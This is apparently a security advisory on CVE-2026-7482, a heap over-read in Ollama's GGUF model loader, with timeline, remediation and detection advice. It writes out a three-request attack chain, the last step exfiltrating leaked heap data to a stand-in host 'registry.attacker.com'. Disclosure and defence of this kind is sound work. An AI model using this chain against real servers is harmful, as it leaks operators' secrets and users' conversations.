CVE-2026-7482: Bleeding Llama — Critical Unauthenticated Memory Leak in Ollama
How Bleeding Llama allows unauthenticated remote attackers to extract API keys, prompt histories, and environment secrets in 3 API calls.
CVE-2026-7482
Severity: CVSS 9.3
Status: Impacting 300,000 exposed Ollama servers
Target Component: Ollama AI Runner API
This article is part of our Week of May 7, 2026 Security Roundup.
CVE-2026-7482, dubbed Bleeding Llama, is a critical heap out-of-bounds read vulnerability in Ollama — the popular open-source framework for running large language models locally. Discovered by Cyera Research and assigned a CVSS score of 9.3, it allows any unauthenticated attacker to extract sensitive heap data from approximately 300,000 internet-facing Ollama deployments using just three API calls.
Vulnerability Details
The flaw lives in Ollama's GGUF model loader, specifically in fs/ggml/gguf.go and server/quantization.go. When the server processes a GGUF file where the declared tensor offset and size exceed the file's actual length, the WriteTo() function reads past the allocated heap buffer during the quantization conversion process (F16 to F32).
Because the F16 to F32 conversion is lossless, every byte of leaked heap memory is preserved intact inside the resulting model file. The attacker then uses Ollama's built-in /api/push endpoint — which accepts arbitrary registry hostnames — to exfiltrate the data-poisoned model to an attacker-controlled registry.
Attack Chain (3 Unauthenticated API Calls)
# 1. Upload a malicious GGUF blob with mismatched tensor metadata
POST /api/blobs/sha256:<hash>
Content-Type: application/octet-stream
<malicious GGUF file>
# 2. Create a model — triggers quantization and heap overread
POST /api/create
{"name": "exploit-model", "modelfile": "FROM @sha256:<hash>"}
# 3. Exfiltrate the tainted model (with embedded heap data) to attacker registry
POST /api/push
{"name": "registry.attacker.com/leaked-model"}The attack succeeds silently. Ollama logs no errors and the server does not crash, making detection difficult without dedicated monitoring of the /api/create and /api/push endpoints.
What Data Is Exposed
The leaked heap may contain: environment variables (including any secrets set at the OS level), API keys loaded into the process, system prompts from other currently loaded models, concurrent user conversation data from other sessions, and proprietary code or customer data flowing through AI workflows connected to Ollama.
Why It Stayed Hidden for Months
Cyera reported the vulnerability to Ollama on February 2, 2026. Ollama acknowledged and shipped a fix in version 0.17.1 on February 25 — but the release notes made no mention of a security fix, so many operators never knew they needed to upgrade. A CVE request to MITRE on March 2 went unanswered. Cyera escalated to Echo CNA, which assigned CVE-2026-7482 on April 28 and published it May 1. That is nearly three months during which the vulnerability was invisible to scanners, vulnerability feeds, and SBOM correlation tools.
This is exactly the failure mode OWASP Dependency-Track and SBOM-based monitoring is designed to catch — but only works when CVEs are assigned promptly and patch release notes are accurate.
Affected Versions
All Ollama versions before 0.17.1. The patch is included in Ollama 0.17.1 and later.
Remediation
# Check your current Ollama version
ollama --version
# Upgrade
curl -fsSL https://ollama.com/install.sh | sh
# Verify
ollama --version # should show 0.17.1 or later
# Bind to localhost only (never expose to internet)
export OLLAMA_HOST=127.0.0.1
# If running via systemd, update the service
sudo systemctl edit ollama
# Add: Environment="OLLAMA_HOST=127.0.0.1"
# Rotate all secrets on previously exposed instances
# Check for unexpected pushes in logs
grep '/api/push' /var/log/ollama.log | grep -v '127.0.0.1'Detection
Monitor /api/create and /api/push endpoints for requests originating from unexpected sources. Alert on any /api/push calls where the registry hostname is not your internal registry. If Ollama has been publicly accessible, assume heap data exposure and rotate all secrets — GitHub tokens, cloud provider credentials, API keys, and any other secrets present in the server's environment.
References: Cyera Research disclosure | Echo CVE-2026-7482 | SecurityWeek coverage | runZero analysis